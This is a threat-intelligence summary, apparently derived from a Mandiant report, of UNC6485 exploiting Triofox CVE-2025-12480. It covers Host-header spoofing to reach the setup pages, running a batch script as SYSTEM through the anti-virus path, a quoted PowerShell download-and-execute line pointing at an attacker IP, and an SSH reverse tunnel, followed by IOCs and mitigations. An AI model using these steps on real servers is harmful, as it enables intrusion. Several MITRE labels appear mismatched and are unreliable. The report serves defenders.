No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480

Mandiant discovered UNC6485 exploiting an unauthenticated access vulnerability (CVE-2025-12480) in Gladinet Triofox that allowed attackers to bypass authentication, create an admin account, and achieve code execution by abusing the built-in anti‑virus feature. The actor used that access to deploy a Zoho UEMS installer, install remote access tools (Zoho Assist, AnyDesk), and establish an SSH reverse tunnel for RDP access. #CVE-2025-12480 #UNC6485 #Triofox

Keypoints

Mandiant identified exploitation of an unauthenticated access control flaw in Gladinet Triofox (version 16.4.10317.56372) that was patched in 16.7.10368.56560 (CVE-2025-12480).
The vulnerability stemmed from trusting the HTTP Host header (Request.Url.Host) and granting access when it equaled “localhost”, allowing host header spoofing to reach setup pages.
UNC6485 used the setup workflow to create a native admin account “Cluster Admin” and then configured Triofox’s anti‑virus engine path to point to a malicious batch script, which executed as SYSTEM.
The attacker’s batch script downloaded a disguised Zoho UEMS installer from 84.200.80[.]252 and used the legitimate agent to deploy Zoho Assist and AnyDesk for remote access.
Defense-evasion and persistence included renamed tunneling tools (sihosts.exe, silcon.exe), use of Plink/PuTTY to create an SSH reverse tunnel to 216.107.136[.]46 forwarding RDP, and attempts to modify account passwords and group membership.
Mandiant and Google SecOps detections and UDM hunting queries are provided to detect Gladinet/Triofox process spawning, suspicious file activity, PowerShell download-and-execute behavior, and reverse SSH tunneling.
Recommended mitigations: upgrade Triofox to the patched release, audit admin accounts, verify anti‑virus engine configuration cannot execute arbitrary scripts, and hunt for anomalous outbound SSH and renamed tunneler executables.

MITRE Techniques

[T1189] Drive-by Compromise – Attacker exploited an unauthenticated access control vulnerability (host header spoofing) to reach setup pages and create an admin account: “…Changing the Host value to localhost grants access to the AdminDatabase.aspx page.”
[T1190] Exploit Public-Facing Application – CVE-2025-12480 was exploited to bypass authentication and access configuration pages: “…this now-patched n-day vulnerability…allowed an attacker to bypass authentication and access the application configuration pages…”
[T1543.003] Create or Modify System Process: Windows Service – Attacker used the Triofox anti‑virus configuration to execute a malicious batch script as SYSTEM by pointing the anti‑virus path to the script: “…the file configured as the anti-virus scanner location inherits the Triofox parent process account privileges, running under the context of the SYSTEM account.”
[T1218] Signed Binary Proxy Execution – Attacker downloaded and executed a legitimate Zoho UEMS installer to deploy remote access tools, using a trusted installer to run subsequent tooling: “…The executed payload was a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer.”
[T1105] Ingress Tool Transfer – The attacker’s PowerShell downloader retrieved a payload from http://84.200.80[.]252 and saved it to C:WindowsappcompatSAgentInstaller_16.7.10368.56560.exe: “…$url = ‘http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip’; $out = ‘C:WindowsappcompatSAgentInstaller_16.7.10368.56560.exe’; Invoke-WebRequest -Uri $url -OutFile $out; Start-Process $out -ArgumentList ‘/silent’ -Wait”
[T1021.004] Remote Services: SMB/Windows Admin Shares – Attacker enumerated active SMB sessions and local/domain user information via remote access tools to perform reconnaissance and privilege escalation: “The attacker used Zoho Assist to run various commands to enumerate active SMB sessions and specific local and domain user information.”
[T1090.001] Proxy: External Proxy – Attacker used Plink/PuTTY (sihosts.exe/silcon.exe) to create an SSH reverse tunnel to forward RDP over port 433, enabling inbound remote desktop access: “These tools were used to set up an encrypted tunnel…forward all traffic over the tunnel to the compromised host on port 3389.”
[T1071.001] Web Protocols – PowerShell Invoke-WebRequest was used to download the UEMS payload over HTTP from 84.200.80[.]252: “…Invoke-WebRequest -Uri $url -OutFile $out;”
[T1566.001] Phishing (credential access via account creation abuse) – While not traditional phishing, the attacker abused the application setup workflow to create admin credentials and gain initial access: “…used these pages to run the initial Triofox setup process to create a new native admin account, Cluster Admin…”

Indicators of Compromise

[IP Address] attacker and hosting infrastructure – 85.239.63[.]37 (initial exploit), 65.109.204[.]197 (subsequent login), 84.200.80[.]252 (payload host), 216.107.136[.]46 (Plink C2).
[File Hash – SHA256] malicious and tool artifacts – SAgentInstaller_16.7.10368.56560.exe: 43c455274d41e58132be7f66139566a941190ceba46082eb2ad7a6a261bfd63f; sihosts.exe (Plink): 50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7.
[File Hash – SHA256] additional tool/harness examples – silcon.exe (PuTTY): 16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad; file.exe (AnyDesk): ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7c6a9a4eace2f.
[File Path / Filename] local artifacts and scripts – C:triofoxcentre_report.bat (attacker batch script) executed via anti‑virus path; C:WindowsappcompatSAgentInstaller_16.7.10368.56560.exe (downloaded installer).
[Domain / URL] downloader location – http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip – hosted disguised installer; and associated suspicious HTTP GET requests containing unusual Referer headers (e.g., requests with Host header set to localhost from external IPs like 85.239.63[.]37).

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print